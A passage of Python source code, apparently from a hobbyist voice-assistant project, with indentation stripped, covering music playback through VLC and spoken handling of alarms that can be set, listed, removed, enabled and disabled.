Myassistant.say(self, Myassistant.yes() + ', ' + str(" ".join(mus)) + ' playback', 'en')
vlc.play_audio_folder(path)
y = False
if y == True:
lllf = []
for path, dirs, files in os.walk(settings.get("Path to your music")):
for file in files:
lllf.append([file,path + '/' + file])
for adir in dirs:
lllf.append([adir,path + '/' + adir])
jhg = []
for ggf in lllf:
jhg.append(ggf[0])
resultmotw = Myassistant.get_mots(str(" ".join(mus)) + ".mp3",jhg,2)
if not resultmotw == []:
assistant.stop_conversation()
kkj = lllf[jhg.index(resultmotw[0])][1]
if os.path.isdir(kkj):
Myassistant.say(self, Myassistant.yes() + ', ' + lllf[jhg.index(resultmotw[0])][0] + ' playback', 'en')
vlc.play_audio_folder(kkj)
else:
Myassistant.say(self, Myassistant.yes() + ', ' + lllf[jhg.index(resultmotw[0])][0].replace('.mp3','') + ' playback', 'en')
vlc.play_audio_file(kkj)
y = False
if settings.get("Alarm"):
uytpv = False
for e in self.tink:
if 'alarm' in e:
uytpv = True
if 'alarm' in str(usrcmd).lower() or uytpv:
assistant.stop_conversation()
alarm_option_add = ()
alarm_setting_add = []
alarm_time_add = ()
if 'set' in str(usrcmd).lower():
alarm_option_add = 'new'
elif 'remove' in str(usrcmd).lower() or 'del' in str(usrcmd).lower() or 'delete' in str(usrcmd).lower():
alarm_option_add = 'del'
elif 'enable' in str(usrcmd).lower():
alarm_option_add = 'enable'
elif 'disable' in str(usrcmd).lower():
alarm_option_add = 'disable'
else:
alarm_option_add = 'get'
today = ['-',str(time.strftime("%A"))]
listal = []
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if 'monday' in str(usrcmd).lower():
alarm_setting_add.append('Monday')
if 'tuesday' in str(usrcmd).lower():
alarm_setting_add.append('Tuesday')
if 'wednesday' in str(usrcmd).lower():
alarm_setting_add.append('Wednesday')
if 'thursday' in str(usrcmd).lower():
alarm_setting_add.append('Thursday')
if 'friday' in str(usrcmd).lower():
alarm_setting_add.append('Friday')
if 'saturday' in str(usrcmd).lower():
alarm_setting_add.append('Saturday')
if 'sunday' in str(usrcmd).lower():
alarm_setting_add.append('Sunday')
if 'tomorrow' in str(usrcmd).lower():
alarm_setting_add.append(Myassistant.ad_day(time.strftime("%A"),1))
if 'today' in str(usrcmd).lower():
alarm_setting_add.append(time.strftime("%A"))
if 'all' in str(usrcmd).lower():
alarm_setting_add.append('all')
if 'in' in str(usrcmd).lower():
pass
else:
m = []
for word in actionev:
eds = []
for letter in word:
numb = '0123456789'
if letter in numb:
eds.append(letter)
if len(eds) == 1:
m.append('0'+eds[0])
elif len(eds) == 2:
m.append(eds[0]+eds[1])
if len(m) == 1:
m = [m[0],'00']
elif len(m) == 2:
m = [m[0],m[1]]
elif len(m) > 2:
m = [m[0],m[1]]
if not len(m) == 0:
if 'pm' in ' '.join(actionev):
m[0] = str(int(m[0]+12))
if m[0] == '24':
m[0] = '00'
if m[1] == '60':
m[1] = '00'
if not (int(m[0]) > 23 or int(m[1]) > 59):
alarm_time_add = m
for e in self.tink:
if 'alarm' in e:
fg = eval(e.replace('alarm',''))
if fg[0] == 'new':
alarm_option_add = 'new'
if alarm_setting_add == []:
alarm_setting_add = fg[1]
elif fg[0] == 'del':
alarm_option_add = 'del'
elif fg[0] == 'disable':
alarm_option_add = 'disable'
elif fg[0] == 'enable':
alarm_option_add = 'enable'
if alarm_option_add == 'get':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in listal[0][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == listal[0][3]:
if listal[0][0] in today:
if Myassistant.time_as_not_pass(listal[0][1],listal[0][2]):
Myassistant.say(self, 'You have 1 alarm disable for today at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] == '-':
Myassistant.say(self, 'You have 1 alarm disable for tomorrow at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm disable on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm disable on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] in today:
if Myassistant.time_as_not_pass(listal[0][1],listal[0][2]):
Myassistant.say(self, 'You have 1 alarm for today at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] == '-':
Myassistant.say(self, 'You have 1 alarm for tomorrow at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if not len(alarm_setting_add) == 0:
if 'all' in alarm_setting_add:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarms for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
Myassistant.say(self, "You have 1 alarm disable on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
Myassistant.say(self, "You have 1 alarm on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
f = ['You have '+str(len(listalchoice))+' alarms in your choice']
for alar in listalchoice:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarms for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif not alarm_time_add == ():
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
Myassistant.say(self, "You have 1 alarm disable on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
Myassistant.say(self, "You have 1 alarm on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
f = ['You have '+str(len(listalchoice))+' alarms in your choice']
for alar in listalchoice:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarms for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarms for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'new':
if not alarm_time_add == ():
if alarm_setting_add == []:
self.act_cron.append(['-',alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
Myassistant.say(self, 'You have 1 new alarm at '+alarm_time_add[0]+':'+alarm_time_add[1], 'en')
elif len(alarm_setting_add) == 1:
self.act_cron.append([dayb,alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
Myassistant.say(self, 'You have 1 new alarm on '+dayb+' at '+alarm_time_add[0]+':'+alarm_time_add[1], 'en')
else:
f = ['You have '+str(len(alarm_setting_add))+' new alarms']
for dayb in alarm_setting_add:
self.act_cron.append([dayb,alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
f.append('an alarm on '+dayb+' at '+alarm_time_add[0]+':'+alarm_time_add[1])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
self.tink.append('alarm["new",'+str(alarm_setting_add)+']')
Myassistant.say(self, 'For when ?', 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
elif alarm_option_add == 'del':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
Myassistant.say(self, "Ok, your alarm have been removed", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
tr = tr + '. What is your choice ?'
self.tink.append('alarm["del"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
Myassistant.say(self, "Ok, all alarm have been removed", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
Myassistant.say(self, "Ok, all alarm have been removed", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'disable':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
Myassistant.say(self, "Ok, your alarm is disable", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
tr = tr + '. What is your choice ?'
self.tink.append('alarm["disable"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
Myassistant.say(self, "Ok, all alarm are disable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is disable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are disable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' are disable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are disable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
Myassistant.say(self, "Ok, all alarm are disable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is disable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are disable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'enable':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
Myassistant.say(self, "Ok, your alarm is enable", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
tr = tr + '. What is your choice ?'
self.tink.append('alarm["enable"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
Myassistant.say(self, "Ok, all alarm are enable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is enable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are enable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' are enable', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms are enable']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
Myassistant.say(self, "Ok, all alarm are enable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
